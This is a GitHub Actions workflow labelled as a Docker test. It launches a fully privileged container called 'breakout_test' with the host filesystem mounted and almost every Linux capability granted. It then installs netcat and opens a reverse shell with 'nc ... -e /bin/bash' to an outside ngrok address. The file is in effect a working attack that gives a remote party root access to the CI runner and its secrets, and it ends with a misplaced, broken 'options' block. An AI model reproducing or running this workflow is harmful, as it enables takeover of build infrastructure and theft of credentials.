name: Docker Test Workflow

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  docker-test:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v2

      - name: Run Docker Container with Privileged Mode and TTY
        run: |
          docker run --rm --privileged \
            -v /:/mnt \
            -v /proc:/proc \
            -v /sys:/sys \
            -v /dev:/mnt/dev \
            -v /boot:/mnt/boot \
            -v /etc:/mnt/etc \
            -v /home:/mnt/home \
            -v /lib:/mnt/lib \
            -v /lib64:/mnt/lib64 \
            -v /opt:/mnt/opt \
            -v /run:/mnt/run \
            -v /sbin:/mnt/sbin \
            -v /usr:/mnt/usr \
            -v /var:/mnt/var \
            --cap-add=SYS_ADMIN \
            --cap-add=SYS_PTRACE \
            --cap-add=SYS_MODULE \
            --cap-add=SYS_NICE \
            --cap-add=SYS_RESOURCE \
            --cap-add=SYS_TIME \
            --cap-add=SYS_TTY_CONFIG \
            --cap-add=NET_ADMIN \
            --cap-add=NET_RAW \
            --cap-add=IPC_LOCK \
            --cap-add=IPC_OWNER \
            --cap-add=LEASE \
            --cap-add=LINUX_IMMUTABLE \
            --cap-add=MAC_ADMIN \
            --cap-add=MAC_OVERRIDE \
            --cap-add=MKNOD \
            --cap-add=SETFCAP \
            --cap-add=SETPCAP \
            --cap-add=WAKE_ALARM \
            --cap-add=AUDIT_CONTROL \
            --cap-add=AUDIT_WRITE \
            --cap-add=BLOCK_SUSPEND \
            --cap-add=DAC_OVERRIDE \
            --cap-add=DAC_READ_SEARCH \
            --name breakout_test \
            -d alpine sleep 600

      - name: Verify Container is Running
        run: docker ps -a

      - name: Install systemctl and netcat in Running Container
        run: |
          docker exec --privileged -it breakout_test apk add --no-cache systemctl netcat-openbsd

      - name: Connect to ngrok Server
        run: |
          docker exec --privileged -it breakout_test nc 0.tcp.us-cal-1.ngrok.io 14657 -e /bin/bash

      - name: Verify Setup and Interaction
        run: |
          docker exec --privileged -it breakout_test bash -c "echo 'Setup complete and connected to ngrok'"

          options:
            machineType: 'E2_HIGHCPU_8'
